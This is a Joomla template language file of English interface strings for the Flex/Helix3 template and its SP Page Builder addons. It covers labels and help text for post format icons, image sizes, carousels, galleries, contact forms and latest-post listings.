FLEX_CUSTOM_GALLERY_POST_FORMAT_ICON_DESC="Custom Icon for Gallery Post Format, for example: “fa fa-picture-o” (Font Awesome icon) or “pe pe-7s-photo” (Pixeden icon). If empty, default icon will be shown."
FLEX_CUSTOM_VIDEO_POST_FORMAT_ICON="Video Post Format Icon"
FLEX_CUSTOM_VIDEO_POST_FORMAT_ICON_DESC="Custom Icon for Video Post Format, for example: “fa fa-video-camera” (Font Awesome icon) or “pe pe-7s-video” (Pixeden icon). If empty, default icon will be shown."
FLEX_CUSTOM_AUDIO_POST_FORMAT_ICON="Audio Post Format Icon"
FLEX_CUSTOM_AUDIO_POST_FORMAT_ICON_DESC="Custom Icon for Audio Post Format, for example: “fa fa-music” (Font Awesome icon) or “pe pe-7s-music” (Pixeden icon). If empty, default icon will be shown."
FLEX_CUSTOM_LINK_POST_FORMAT_ICON="Link Post Format Icon"
FLEX_CUSTOM_LINK_POST_FORMAT_ICON_DESC="Custom Icon for Link Post Format, for example: “fa fa-link” (Font Awesome icon) or “pe pe-7s-link” (Pixeden icon). If empty, default icon will be shown."
FLEX_CUSTOM_STATUS_POST_FORMAT_ICON="Status Post Format Icon"
FLEX_CUSTOM_STATUS_POST_FORMAT_ICON_DESC="Custom Icon for Status Post Format, for example: “fa fa-comment-o” (Font Awesome icon) or “pe pe-7s-comment” (Pixeden icon). If empty, default icon will be shown."
FLEX_CUSTOM_QUOTE_POST_FORMAT_ICON="Quote Post Format Icon"
FLEX_CUSTOM_QUOTE_POST_FORMAT_ICON_DESC="Custom Icon for Quote Post Format, for example: “fa fa-quote-left” (Font Awesome icon) or “pe pe-7s-news-paper” (Pixeden icon). If empty, default icon will be shown."

FLEX_CUSTOM_POST_FORMAT_ICON="Custom Post Format Icon"
FLEX_CUSTOM_POST_FORMAT_ICON_DESC="Custom Icon for Additional Post Format, for example: “fa fa-shopping-cart” (Font Awesome icon) or “pe pe-7s-cart” (Pixeden icon). If empty, default icon will be shown."

HELIX3_ARTICLE_RATING="Rating"
HELIX_IMAGE_SIZES="Image Sizes"
HELIX_IMAGE_SMALL="Enable Small Image"
HELIX_IMAGE_SMALL_DESC="Enable small size image feature. Disable if not required."
HELIX_IMAGE_SMALL_SIZE="Small Image Size"
HELIX_IMAGE_SMALL_SIZE_DESC="Set the small image size in pixels. e.g 100x100"
HELIX_IMAGE_THUMBNAIL="Enable Thumbnail Image"
HELIX_IMAGE_THUMBNAIL_DESC="Enable image thumbnail feature. Disable if not required."
HELIX_IMAGE_THUMBNAIL_SIZE="Thumbnail Image Size"
HELIX_IMAGE_THUMBNAIL_SIZE_DESC="Set the thumbnail image size in pixels. e.g 200x200"
HELIX_IMAGE_MEDIUM="Enable Medium Image"
HELIX_IMAGE_MEDIUM_DESC="Enable medium size image feature. Disable if not required."
HELIX_IMAGE_MEDIUM_SIZE="Medium Image Size"
HELIX_IMAGE_MEDIUM_SIZE_DESC="Set the medium image size in pixels. e.g 300x300"
HELIX_IMAGE_LARGE="Enable Large Image"
HELIX_IMAGE_LARGE_DESC="Enable large size image feature. Disable if not required."
HELIX_IMAGE_LARGE_SIZE="Large Image Size"
HELIX_IMAGE_LARGE_SIZE_DESC="Set the large image size in pixels. e.g 600x600"
HELIX_BLOG_LIST_IMAGE="Blog List Image"
HELIX_BLOG_LIST_IMAGE_DESC="Select an image size for blog list. By default if a featured image will be shown if available."
HELIX_BLOG_LIST_IMAGE_DEFAULT="Default"
HELIX_BLOG_LIST_IMAGE_SMALL="Small"
HELIX_BLOG_LIST_IMAGE_THUMBNAIL="Thumbnail"
HELIX_BLOG_LIST_IMAGE_MEDIUM="Medium"
HELIX_BLOG_LIST_IMAGE_LARGE="large"

;Documenation Tab;
COM_TEMPLATES_DOCUMENTATION_FIELDSET_LABEL="<i class='fa fa-book'></i> Documentation"
HELIX_CLICK_TO_VIEW="Click To View"
HELIX3_DOCUMENTATION="Helix3 Documentation"
HELIX3_DOCUMENTATION_DESC="Click to view Helix3 online documentation."

; Assignment 
COM_TEMPLATES_MENUS_ASSIGNMENT="<i class='fa fa-check-square-o'></i>Assignment"

; Front-end
HELIX_MONTH="Month"
HELIX_MONTHS="Months"
HELIX_DAY="Day"
HELIX_DAYS="Days"
HELIX_HOUR="Hour"
HELIX_HOURS="Hours"
HELIX_MINUTE="Minute"
HELIX_MINUTES="Minutes"
HELIX_SECOND="Second"
HELIX_SECONDS="Seconds"
HELIX_GO_BACK="Go Back to Homepage"
HELIX_TAGS="Tags"
HELIX_404="Oops... Page Not Found!"
HELIX_404_MESSAGE="We're sorry, but the page you were looking for doesn't exist."
HELIX3_COUNT_RATING="Rating"
HELIX3_COUNT_RATINGS="Ratings"
HELIX_FACEBOOK="Facebook"
HELIX_TWITTER="Twitter"
HELIX_SHARE_FACEBOOK="Share On Facebook"
HELIX_SHARE_TWITTER="Share On Twitter"
HELIX_SHARE_GOOGLE_PLUS="Share On Google Plus"
HELIX_SHARE_LINKEDIN="Share On Linkedin"
HELIX_SHARE_PINTERSET="Share On Pinterest"


; Page Builder Addons 
FLEX_GLOBAL_BACKGROUND="Background Color"
FLEX_GLOBAL_BACKGROUND_DESC=""
FLEX_GLOBAL_BORDER_COLOR="Border Color"
FLEX_GLOBAL_BORDER_COLOR_DESC=""
FLEX_GLOBAL_BORDER_WIDTH_SIZE="Border Width Size"
FLEX_GLOBAL_BORDER_WIDTH_SIZE_DESC=""
FLEX_GLOBAL_BORDER_RADIUS="Border Radius"
FLEX_GLOBAL_BORDER_RADIUS_DESC=""
FLEX_GALLERY_ITEMS="Gallery Items"
FLEX_GALLERY_FULL_DESC="Image to show on click in lightbox."
FLEX_THUMBNAIL_SPACING="Space between thumbnails"
FLEX_THUMBNAIL_SPACING_DESC="Set space (gap) between thumbnails in pixels"
COM_SPPAGEBUILDER_ADDON_ICONS="Icon"
COM_SPPAGEBUILDER_ADDON_ICONS_DESC="Use 202 Pixeden or 675+ Font Awesome Icons"
COM_SPPAGEBUILDER_ADDON_FONTAWESOME_ICON="Font Awesome Icon"
COM_SPPAGEBUILDER_ADDON_FONTAWESOME_ICON_DESC="Choose one of 675+ Font Awesome icons for element"
COM_SPPAGEBUILDER_ADDON_PIXEDEN_ICON="Pixeden Font Icon"
COM_SPPAGEBUILDER_ADDON_PIXEDEN_ICON_DESC="Choose one of 202 Pixeden icons for element"
COM_SPPAGEBUILDER_ADDON_BUTTON_ICON="Button's Icon"
COM_SPPAGEBUILDER_ADDON_BUTTON_ICON_DESC="Choose one of 202 Pixeden or 675+ Font Awesome icons for button"
COM_SPPAGEBUILDER_ADDON_BUTTON_PIXEDEN_ICON="Button's Pixeden Icon"
COM_SPPAGEBUILDER_ADDON_BUTTON_PIXEDEN_ICON_DESC="Choose one of 202 Pixeden icons for button"
COM_SPPAGEBUILDER_ADDON_BUTTON_FONTAWESOME_ICON="Button's Font Awesome Icon"
COM_SPPAGEBUILDER_ADDON_BUTTON_FONTAWESOME_ICON_DESC="Choose one of 675+ Font Awesome icons for button"
COM_SPPAGEBUILDER_ADDON_GLOBAL_ICON_SIZE="Icon Size"
COM_SPPAGEBUILDER_ADDON_GLOBAL_ICON_SIZE_DESC="Choose number for Icon Size"
COM_SPPAGEBUILDER_ADDON_IMAGE_CONTENT="Image Content"
COM_SPPAGEBUILDER_ADDON_IMAGE_CONTENT_DESC="Addon to add image and content together."
COM_SPPAGEBUILDER_ADDON_IMAGE_CONTENT_TITLE="Addon Title"
COM_SPPAGEBUILDER_ADDON_IMAGE_CONTENT_TITLE_DESC="Enter the title to the content block. Leave blank if no title is required."
COM_SPPAGEBUILDER_ADDON_IMAGE_CONTENT_CONTENT="Content"
COM_SPPAGEBUILDER_ADDON_IMAGE_CONTENT_CONTENT_DESC="Enter text for the content block."
COM_SPPAGEBUILDER_ADDON_IMAGE_CONTENT_IMAGE="Image"
COM_SPPAGEBUILDER_ADDON_IMAGE_CONTENT_IMAGE_WIDTH="Width of the image section"
COM_SPPAGEBUILDER_ADDON_IMAGE_CONTENT_IMAGE_WIDTH_DESC="Set the width of the image section without % sign. eg. 50"
COM_SPPAGEBUILDER_ADDON_IMAGE_CONTENT_IMAGE_ALIGNMENT="Image Position"
COM_SPPAGEBUILDER_ADDON_IMAGE_CONTENT_IMAGE_ALIGNMENT_DESC="Set image section position to left or right."
FLEX_ADDON_ICON_TXT_COLOR="Icon or Text (percentage) Color"
FLEX_ADDON_ICON_TXT_COLOR_DESC="Custom color for icon (if selected) or text (percentage)."
FLEX_ADDON_CONTENT_TXT_COLOR="Text Color"
FLEX_ADDON_CONTENT_TXT_COLOR_DESC="Custom color for text in content."
FLEX_ADDON_SELECTOR_ALIGNMENT="Selector Alignment"
FLEX_ADDON_SELECTOR_ALIGNMENT_DESC="Set the selector's alignment from the list."

; Image Addon
COM_SPPAGEBUILDER_ADDON_IMAGE_LINK="Image Link"
COM_SPPAGEBUILDER_ADDON_IMAGE_LINK_DESC="Enable or Disable Link to Image"
COM_SPPAGEBUILDER_ADDON_IMAGE_URL="Link URL "
COM_SPPAGEBUILDER_ADDON_IMAGE_URL_DESC="URL of the page that will be linked."
COM_SPPAGEBUILDER_ADDON_IMAGE_LINK_OVERLAY="Link Icon Overlay"
COM_SPPAGEBUILDER_ADDON_IMAGE_LINK_OVERLAY_DESC="You can enable/disable “Overlay” effect with “link” icon for Image."

; Pixeden Icons
COM_SPPAGEBUILDER_ADDON_GLOBAL_NO_PE_ICON="-- No Icon --"
COM_SPPAGEBUILDER_ADDON_GLOBAL_PE_ICON_NAME="Pixeden Thin Icons"
COM_SPPAGEBUILDER_ADDON_GLOBAL_PE_ICON_NAME_DESC="Select an icon from 202 “pe” icons (“Pixeden icons”)"

; Font Awesome Icons 
COM_SPPAGEBUILDER_ADDON_GLOBAL_FONTAWESOME_ICON_NAME="Font Awesome Icons"
COM_SPPAGEBUILDER_ADDON_GLOBAL_FONTAWESOME_ICON_NAME_DESC="Select an icon from 675+ “Font Awesome icons”"

; SP Simple Portfolio Module
MOD_SPSIMPLEPORTFOLIO_FIELD_FILTER_STYLE="Filter Style"
MOD_SPSIMPLEPORTFOLIO_FIELD_FILTER_STYLE_DESC="Choose style for “Filter” buttons (tags)."
MOD_SPSIMPLEPORTFOLIO_FIELD_FILTER_STYLE_SIMPLE="Simple"
MOD_SPSIMPLEPORTFOLIO_FIELD_FILTER_STYLE_FLEX="Flex"
MOD_SPPORTFOLIO_SHOW_FILTER_DIVIDER_LABEL="Divider for “Simple” style"
MOD_SPPORTFOLIO_SHOW_FILTER_DIVIDER_LABEL_DESC="Custom character between filter buttons (tags), only for “Simple” filter style. For example: “ / ”."

; Addon Progress Bar 
COM_SPPAGEBUILDER_ADDON_PROGRESS_BAR_ANIMATION_DURATION="Custom animation duration for progress bar"
COM_SPPAGEBUILDER_ADDON_PROGRESS_BAR_ANIMATION_DURATION_DESC="Set the custom animation duration for progress bar in seconds. Default: 2 (seconds)."
COM_SPPAGEBUILDER_ADDON_PROGRESS_BAR_ANIMATION_DELAY="Custom delay for animation"
COM_SPPAGEBUILDER_ADDON_PROGRESS_BAR_ANIMATION_DELAY_DESC="Set the custom delay for animation, for progress bar. Default: 0 (seconds)."
COM_SPPAGEBUILDER_ADDON_PROGRESS_BAR_CUSTOM_BACKGROUND_COLOR="Custom Color for Background Bar"
COM_SPPAGEBUILDER_ADDON_PROGRESS_BAR_CUSTOM_BACKGROUND_COLOR_DESC="Set the custom color for background bar."
COM_SPPAGEBUILDER_ADDON_PROGRESS_BAR_CUSTOM_COLOR="Custom Color for Progress bar"
COM_SPPAGEBUILDER_ADDON_PROGRESS_BAR_CUSTOM_COLOR_DESC="Set the custom color for progress bar."
COM_SPPAGEBUILDER_ADDON_PROGRESS_BAR_CUSTOM_HEIGHT="Custom Height"
COM_SPPAGEBUILDER_ADDON_PROGRESS_BAR_CUSTOM_HEIGHT_DESC="Set the custom height for progress bar in px. It will always be a square. Default size 20."

; Addon Pie Progress
FLEX_CONTENT_LABEL="Content"
FLEX_CONTENT_DESC="Enter text for the content block."

; Addon Pricing Tables
FLEX_ADDON_PRICING_CURRENCY="Currency"
FLEX_ADDON_PRICING_CURRENCY_DESC="Insert currency for the price."
FLEX_ADDON_PRICING_HEADER_COLOR="Header Text Color"
FLEX_ADDON_PRICING_HEADER_COLOR_DESC=""
FLEX_ADDON_PRICING_FEATURES_COLOR="Features Text Color"
FLEX_ADDON_PRICING_FEATURES_COLOR_DESC=""
FLEX_ADDON_PRICING_BORDER_RADIUS="Border Radius"
FLEX_ADDON_PRICING_BORDER_RADIUS_DESC="Custom border radius for Price box"

; Addon Carousel
COM_SPPAGEBUILDER_ADDON_CAROUSEL_GLOBAL_PADDING="Padding"
COM_SPPAGEBUILDER_ADDON_CAROUSEL_GLOBAL_PADDING_DESC="Padding area between the content of the element and its border (Top Right Bottom Left). Negative values are not allowed. Default is 60px."

; Addon Gallery
COM_SPPAGEBUILDER_ADDON_GALLERY_THUMBS_GAP="Gap (margin) Between Thumbnails"
COM_SPPAGEBUILDER_ADDON_GALLERY_THUMBS_GAP_DESC="Sets a gap (margin) between thumbnails. Default value is 0 (no margin)."
COM_SPPAGEBUILDER_ADDON_GALLERY_THUMBS_GAP_PLACEHOLDER="for example: 10 (px)"

; Addon Person
FLEX_ADDON_PERSON_BACKGROUND="Custom Background for Person"
FLEX_ADDON_PERSON_BACKGROUND_DESC="Sets a custom background for Person."
FLEX_ADDON_PERSON_BEHANCE_DESC="Enter absolute url of Behance profile. Leave blank if not required."
FLEX_ADDON_PERSON_INTROTEXT_FONT_FAMILY="Introtext Font Family"

; Addon Tabs
COM_SPPAGEBUILDER_ADDON_TAB_FLUID="Fluid or Adaptive Style for Tabs"
COM_SPPAGEBUILDER_ADDON_TAB_FLUID_DESC="Fluid style is “full width” style, and Adaptive style is with “auto” (adaptive) width for tabs. Default style is “Fluid”."
COM_SPPAGEBUILDER_ADDON_TAB_FLUID_STYLE="Fluid (full width)"
COM_SPPAGEBUILDER_ADDON_TAB_ADAPTIVE_STYLE="Adaptive (auto width)"

; Ajax Contact 
FLEX_ADDON_AJAX_CONTACT_NAME="Name"
FLEX_ADDON_AJAX_CONTACT_EMAIL="Email"
FLEX_ADDON_AJAX_CONTACT_SUBJECT="Subject"
FLEX_ADDON_AJAX_CONTACT_MESSAGE="Message"
FLEX_ADDON_AJAX_CONTACT_SEND="Send Message"
FLEX_ADDON_AJAX_CONTACT_WRONG_CAPTCHA="Wrong answer! Please enter right answer."
FLEX_ADDON_AJAX_CONTACT_SUCCESS="Email sent successfully!"
FLEX_ADDON_AJAX_CONTACT_FAILED="Email sent failed."
FLEX_ADDON_AJAX_CONTACT_STYLE="Choose Style"
FLEX_ADDON_AJAX_CONTACT_STYLE_DESC="Choose one of 2 styles for Ajax Contact Form. “Dark” style is for dark background with light colored text."
COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_INVISIBLE_CAPTCHA_NOT_INSTALLED="Please make sure that Invisible reCAPTCHA pluging is enabled (installed)"

; Addon Slick Carousel 
FLEX_ADDON_SLICK_CAROUSEL="Slick Carousel"
FLEX_ADDON_SLICK_CAROUSEL_DESC="Multi-purpose slider/carousel with images"
FLEX_ADDON_SETTINGS="Settings"
FLEX_ADDON_SLICK_CAROUSEL_LOOP="Infinite loop"
FLEX_ADDON_SLICK_CAROUSEL_LOOP_DESC="Use Infinite loop sliding for images. Default value: Yes."
FLEX_ADDON_SLICK_CAROUSEL_LAZYLOAD="Lazy-Loading for Images"
FLEX_ADDON_SLICK_CAROUSEL_LAZYLOAD_DESC="Use Lazy-Loading for images. Default value: Yes."
FLEX_ADDON_SLICK_CAROUSEL_SLIDES_TO_SHOW="Slides to Show"
FLEX_ADDON_SLICK_CAROUSEL_SLIDES_TO_SHOW_DESC="Set how many slides to show. Default value: 1"
FLEX_ADDON_SLICK_CAROUSEL_SLIDES_TO_SCROLL="Slides to Scroll"
FLEX_ADDON_SLICK_CAROUSEL_SLIDES_TO_SCROLL_DESC="Set how many slides to scroll.  Default value: 1"
FLEX_ADDON_SLICK_CAROUSEL_SPACE_BETWEEN_IMG="Space between images"
FLEX_ADDON_SLICK_CAROUSEL_SPACE_BETWEEN_IMG_DESC="Space between images. Default is 0 (no space)."
FLEX_ADDON_SLICK_CAROUSEL_FADE_EFFECT="Enable Fade effect"
FLEX_ADDON_SLICK_CAROUSEL_FADE_EFFECT_DESC="Set Fade effect for Carousel, instead of slide.  <strong>NOTE:</strong> Fade effect is effective only with <strong>one</strong> slide to show (“Slides to Show”). Default value: No."
FLEX_ADDON_SLICK_CAROUSEL_AUTOPLAY="Enable Autoplay"
FLEX_ADDON_SLICK_CAROUSEL_AUTOPLAY_DESC="Set Autoplay for Carousel. Default value: Yes."
FLEX_ADDON_SLICK_CAROUSEL_AUTOPLAY_SPEED="Speed"
FLEX_ADDON_SLICK_CAROUSEL_AUTOPLAY_SPEED_DESC="Set Slide/Fade animation speed in milliseconds. 1 second = 1000 milliseconds. Default value: 500 (milliseconds)."
FLEX_ADDON_SLICK_CAROUSEL_ARROWS="Enable Arrows"
FLEX_ADDON_SLICK_CAROUSEL_ARROWS_DESC="Set Arrows for Carousel. Default value: Yes."
FLEX_ADDON_SLICK_CAROUSEL_ARROWS_SIZE="Arrows Font Size"
FLEX_ADDON_SLICK_CAROUSEL_ARROWS_SIZE_DESC="Set Arrows Font Size. Default value: 44(px)."
FLEX_ADDON_SLICK_CAROUSEL_ARROWS_COLOR="Arrows Color"
FLEX_ADDON_SLICK_CAROUSEL_ARROWS_COLOR_DESC="Arrows Color"
FLEX_ADDON_SLICK_CAROUSEL_ARROWS_BACKGROUND_COLOR="Arrows Background Color"
FLEX_ADDON_SLICK_CAROUSEL_ARROWS_BACKGROUND_COLOR_DESC="Arrows Background Color"
FLEX_ADDON_SLICK_CAROUSEL_COUNTER="Enable Counter"
FLEX_ADDON_SLICK_CAROUSEL_COUNTER_DESC="Enable or Disable Counter. Default value: No."
FLEX_ADDON_SLICK_CAROUSEL_COUNTER_COLOR="Counter Color"
FLEX_ADDON_SLICK_CAROUSEL_COUNTER_COLOR_DESC="Set the Counter Color."
FLEX_ADDON_SLICK_CAROUSEL_ARROWS_CLASS="CSS Class for Arrows"
FLEX_ADDON_SLICK_CAROUSEL_ARROWS_CLASS_DESC="If you wish to style arrows differently, then use this field to add a class name and then refer to it in your css file."
FLEX_ADDON_SLICK_CAROUSEL_DOTS="Enable Dots"
FLEX_ADDON_SLICK_CAROUSEL_DOTS_DESC="Enable Dots for Carousel. Default value: Yes."
FLEX_ADDON_SLICK_CAROUSEL_DOTS_COLOR="Dots Color"
FLEX_ADDON_SLICK_CAROUSEL_DOTS_COLOR_DESC="Set custom color for Dots"
FLEX_ADDON_SLICK_CAROUSEL_AUTOHEIGHT="Enable AutoHeight"
FLEX_ADDON_SLICK_CAROUSEL_AUTOHEIGHT_DESC="Enable AutoHeight for Carousel. Default value: Yes."

FLEX_ADDON_RTL_DIR_SEPARATOR="RTL Direction Support"
FLEX_ADDON_RTL_DIR="RTL Direction"
FLEX_ADDON_RTL_DIR_DESC="Change the slider’s direction to become right-to-left (RTL). Default value: No."

FLEX_ADDON_BREAKPOINTS="Responsive (breakpoints)"
FLEX_ADDON_BREAKPOINTS_MEDIUM_DEVICES="Breakpoint for Medium devices"
FLEX_ADDON_BREAKPOINTS_MEDIUM_DEVICES_DESC="Enables settings sets at given screen width. This is breakpoint for medium devices, <strong>desktops</strong> (≥992px)"
FLEX_ADDON_BREAKPOINTS_MEDIUM_DEVICES_SLIDES_TO_SHOW="Set a breakpoint for how many slides to show for medium devices. Default value: 3"
FLEX_ADDON_BREAKPOINTS_SMALL_DEVICES="Breakpoint for Small devices"
FLEX_ADDON_BREAKPOINTS_SMALL_DEVICES_DESC="Enables settings sets at given screen width. This is breakpoint for small devices, <strong>tablets</strong> (≥768px)"
FLEX_ADDON_BREAKPOINTS_SMALL_DEVICES_SLIDES_TO_SHOW="Set a breakpoint for how many slides to show for small devices. Default value: 2"
FLEX_ADDON_BREAKPOINTS_EXTRASMALL_DEVICES="Breakpoint for Extra small devices"
FLEX_ADDON_BREAKPOINTS_EXTRASMALL_DEVICES_DESC="Enables settings sets at given screen width. This is breakpoint for extra small devices, <strong>phones</strong> (<768px)"
FLEX_ADDON_BREAKPOINTS_EXTRASMALL_DEVICES_SLIDES_TO_SHOW="Set a breakpoint for how many slides to show for extra small devices.  Default value: 1"
FLEX_ADDON_TITLE="Title"
FLEX_ADDON_IMAGES="Images"
FLEX_ADDON_IMAGE="Image"
FLEX_ADDON_ICON="Icon"
FLEX_ADDON_SLICK_CAROUSEL_ITEM_TITLE="Item Title"
FLEX_ADDON_SLICK_CAROUSEL_ITEM_TITLE_DESC="Enter the title of this carousel item. This will be the alt text for the image."
FLEX_ADDON_SLICK_CAROUSEL_IMAGE="Image to show in Slick Carousel."
FLEX_ADDON_SLICK_CAROUSEL_THUMB_URL="Thumb Link"
FLEX_ADDON_SLICK_CAROUSEL_THUMB_URL_DESC="The absolute URL of the page that will be linked."
FLEX_ADDON_SLICK_CAROUSEL_ITEM_DESCRIPTION="Item Description"
FLEX_ADDON_SLICK_CAROUSEL_ITEM_DESCRIPTION_DESC="Enter the description for this carousel item."

FLEX_ADDON_SLICK_CAROUSEL_AUTOPLAY_STOP_ON_HOVER="Pause Autoplay On Hover"
FLEX_ADDON_SLICK_CAROUSEL_AUTOPLAY_STOP_ON_HOVER_DESC="Enable or Disable to Pause Autoplay On Hover. Default value: Yes (Paused)."
FLEX_ADDON_SLICK_CAROUSEL_AUTOPLAY_STOP_ON_FOCUS="Pause Autoplay On Focus"
FLEX_ADDON_SLICK_CAROUSEL_AUTOPLAY_STOP_ON_FOCUS_DESC="Enable or Disable to Pause Autoplay On Focus. Default value: Yes (Paused)."

COM_SPPAGEBUILDER_ADDON_AUTOPLAY_INTERVAL="Autoplay Interval in milliseconds"
COM_SPPAGEBUILDER_ADDON_AUTOPLAY_INTERVAL_DESC="Set Autoplay Interval in milliseconds, if “Autoplay” is enabled. 1 second = 1000 milliseconds. Default value: 5000 (5 seconds)."

; Addon Lightbox Gallery 
FLEX_ADDON_IMAGELIGHTBOX="Lightbox Gallery"
FLEX_ADDON_IMAGELIGHTBOX_DESC="Gallery set of photos with lightbox effect"
FLEX_ADDON_IMAGELIGHTBOX_ITEM_TITLE="Item (Caption) Title"
FLEX_ADDON_IMAGELIGHTBOX_ITEM_TITLE_DESC="Enter the caption of this lightbox gallery item. This will be the caption for image and alt text for the gallery image."
FLEX_ADDON_IMAGELIGHTBOX_SHOW_CAPTION="Show Caption"
FLEX_ADDON_IMAGELIGHTBOX_SHOW_CAPTION_DESC="Use Caption for this image in lightbox. Default value: Yes."

; Addon Image Content
COM_SPPAGEBUILDER_ADDON_IMAGE_CONTENT_IMAGE_BACKGROUND_SIZE="Background Size (for the image)"
COM_SPPAGEBUILDER_ADDON_IMAGE_CONTENT_IMAGE_BACKGROUND_SIZE_DESC="Set the background size of the image. Default vaule is cover - this means scale the image to be as large as possible so that the background area is completely covered by the image."
COM_SPPAGEBUILDER_ADDON_GLOBAL_BUTTON="BUTTON"
COM_SPPAGEBUILDER_GLOBAL_DARK="Dark"
COM_SPPAGEBUILDER_GLOBAL_LIGHT="Light"
COM_SPPAGEBUILDER_GLOBAL_FLEX="Flex"
COM_SPPAGEBUILDER_GLOBAL_DEFAULT="Default"

COM_SPPAGEBUILDER_ADDON_CONTENT_PADDING="Content Padding"

; Addon Animated Numbers 
COM_SPPAGEBUILDER_ADDON_ANIMATED_NUMBER_ADDTEXT="Additional custom text to Counter Digit"
COM_SPPAGEBUILDER_ADDON_ANIMATED_NUMBER_ADDTEXT_DESC="Insert custom inline text if you want to add to Counter Digits. For Example: “%” or “$”."

; Addon Teams
COM_SPPAGEBUILDER_ADDON_TEAM="Team"
COM_SPPAGEBUILDER_ADDON_TEAM_DESC="Team's list addon for pagebuilder"
COM_SPPAGEBUILDER_ADDON_BEFORE_TEXT="Before Text"
COM_SPPAGEBUILDER_ADDON_BEFORE_TEXT_DESC="This text will show before team after rows sub title"

; Addon Bootstrap Modal 
COM_SPPAGEBUILDER_ADDON_BOOTSTRAP_MODAL="Bootstrap Modal"
COM_SPPAGEBUILDER_ADDON_BOOTSTRAP_MODAL_DESC="Content, Image or Video modal prompts."
COM_SPPAGEBUILDER_ADDON_BOOTSTRAP_MODAL_WINDOW_TITLE="Window Title"
COM_SPPAGEBUILDER_ADDON_BOOTSTRAP_MODAL_WINDOW_TITLE_DESC="Enter a title for the modal window."
COM_SPPAGEBUILDER_ADDON_MODAL_WINDOW_SIZE="Window Size"
COM_SPPAGEBUILDER_ADDON_MODAL_WINDOW_SIZE_DESC="Set the popup window size from the below list."
COM_SPPAGEBUILDER_ADDON_MODAL_WINDOW_SIZE_STANDARD="Standard"
COM_SPPAGEBUILDER_ADDON_MODAL_WINDOW_SIZE_LARGE="Large"
COM_SPPAGEBUILDER_ADDON_MODAL_WINDOW_SIZE_SMALL="Small"

; Addon Latest Posts
COM_SPPAGEBUILDER_ADDON_LATEST_POSTS="Latest Posts"
COM_SPPAGEBUILDER_ADDON_LATEST_POSTS_DESC="Addon to display latest blog posts."
COM_SPPAGEBUILDER_ADDON_LATEST_POSTS_IMG="Show Image"
COM_SPPAGEBUILDER_ADDON_LATEST_POSTS_IMG_DESC="Show image for latest blog posts. Default value: Yes."
COM_SPPAGEBUILDER_ADDON_LATEST_POSTS_DATE="Show Date"
COM_SPPAGEBUILDER_ADDON_LATEST_POSTS_DATE_DESC="Show date for latest blog posts. Default value: Yes."
COM_SPPAGEBUILDER_ADDON_LATEST_POSTS_CATEGORY="Show Category"
COM_SPPAGEBUILDER_ADDON_LATEST_POSTS_CATEGORY_DESC="Show category for latest blog posts. Default value: Yes."
COM_SPPAGEBUILDER_ADDON_LATEST_POSTS_INTROTEXT="Show Intro Text"
COM_SPPAGEBUILDER_ADDON_LATEST_POSTS_INTROTEXT_DESC="Show intro text for latest blog posts. Default value: Yes."
COM_SPPAGEBUILDER_ADDON_LATEST_POSTS_INTROTEXT_LIMIT="Intro Text limit"
COM_SPPAGEBUILDER_ADDON_LATEST_POSTS_INTROTEXT_LIMIT_DESC=""
COM_SPPAGEBUILDER_ADDON_LATEST_POSTS_AUTHOR="Show Author"
COM_SPPAGEBUILDER_ADDON_LATEST_POSTS_AUTHOR_DESC="Show author(s) for latest blog posts. Default value: Yes."
COM_SPPAGEBUILDER_ADDON_LATEST_POSTS_SELECT_CATEGORY="Select Category"
COM_SPPAGEBUILDER_ADDON_LATEST_POSTS_SELECT_CATEGORY_DESC="Select a category from the list. By default it will show posts from all categories."
COM_SPPAGEBUILDER_ADDON_LATEST_POSTS_LIMIT="Limit Items"
COM_SPPAGEBUILDER_ADDON_LATEST_POSTS_LIMIT_DESC="Items limit of latest posts."
FLEX_LATEST_POSTS_COLUMN_NO="Items per row"
FLEX_LATEST_POSTS_COLUMN_NO_DESC="Number of items per row"
COM_SPPAGEBUILDER_ADDON_COLUMN_NO="Items per row"
COM_SPPAGEBUILDER_ADDON_COLUMN_NO_DESC="Number of posts (articles) per row"
FLEX_LATEST_POSTS_IMAGE_ALIGNMENT="Image Alignment"
FLEX_LATEST_POSTS_IMAGE_ALIGNMENT_DESC="You can choose to align image (when only one item per row) “Left” or “Right”. Default value: Left."
COM_SPPAGEBUILDER_ADDON_CATEGORY="Category: "
COM_SPPAGEBUILDER_ADDON_POSTED_BY="Posted by: "
COM_SPPAGEBUILDER_ADDON_POSTED_IN="Posted in: "
FLEX_ADDON_READMORE="Read More"
FLEX_ADDON_READMORE_DESC="Show “Read More” button (link) for latest blog posts. Default value: No."
FLEX_ADDON_READMORE_BUTTON_TEXT="Read More button text"
FLEX_ADDON_READMORE_BUTTON_TEXT_DESC="Enter custom text for “Read More” button."
FLEX_ADDON_READMORE_BUTTON_POSITION="Read More button Alignment"
FLEX_ADDON_ENABLE_MASONRY="Enable Masonry Effect"
FLEX_ADDON_ENABLE_MASONRY_DESC="Choose if you want Masonry Effect for items (columns)."
FLEX_GLOBAL_DATE_FORMAT="Date Format"
FLEX_GLOBAL_DATE_FORMAT_DESC="Choose available Date Format. Default is “DATE_FORMAT_LC1”"

FLEX_ADDON_SEPARATOR_LAYOUT_TYPE="Layout Type"
FLEX_ADDON_SEPARATOR_CONTENT="Content"

; Addon Icon
FLEX_GLOBAL_ICON_DESC="Select an icon from 202 Pixeden or 675+ “Font Awesome icons”"

; Addon Icons
FLEX_ADDON_ICONS="Icons"
FLEX_ADDON_ICONS_DESC="202 Pixeden or 675+ Font Awesome Inline Icons"
FLEX_ADDON_ICONS_URL="Icon Url"
FLEX_ADDON_ICONS_URL_DESC="When click on this icon it will go this url"
FLEX_ADDON_GLOBAL_ICON_FONT_WEIGHT="Icon Font Weight"
FLEX_ADDON_GLOBAL_ICON_FONT_WEIGHT_DESC="Set font weight for this icon. For example: 100, 300, 500, 800, thin, normal, bold, etc."
FLEX_ADDON_ICONS_GAP="Margin (gap) Between Icons"
FLEX_ADDON_ICONS_GAP_DESC="Sets a margin between icons."
FLEX_ADDON_TITLE_TOOLTIP="Tooltips for Icons"
FLEX_ADDON_TITLE_TOOLTIP_DESC="Enables Tooltips for Icons. Each Icon's title will be used for Tooltip."
FLEX_ADDON_ICONS_TITLE="Icon's Title"
FLEX_ADDON_ICONS_TITLE_DESC="Enter text which will be used as icon's title. Title will be used as tooltip if “Tooltips for Icons” is enabled. Leave blank if no title is needed."
FLEX_ADDON_ICONS_TITLE_STD="Title of the icon"
FLEX_ADDON_GLOBAL_MARGIN="Margin"
FLEX_ADDON_GLOBAL_MARGIN_DESC=""

; Addon Google Maps (Since June 22nd, new domians need to have Google API KEY)
